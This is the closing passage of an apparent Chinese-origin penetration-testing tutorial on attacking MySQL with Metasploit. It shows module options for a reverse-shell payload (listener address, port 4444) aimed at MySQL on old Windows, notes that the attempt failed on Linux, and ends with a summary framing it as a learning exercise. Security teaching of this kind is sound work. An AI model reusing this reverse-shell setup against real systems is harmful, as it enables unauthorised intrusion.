   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   MySQL on Windows prior to Vista

However, because the payload does not support Linux, the attack was not successful.


Summary

This article has walked through using Metasploit to perform penetration testing on MySQL, for learning purposes only.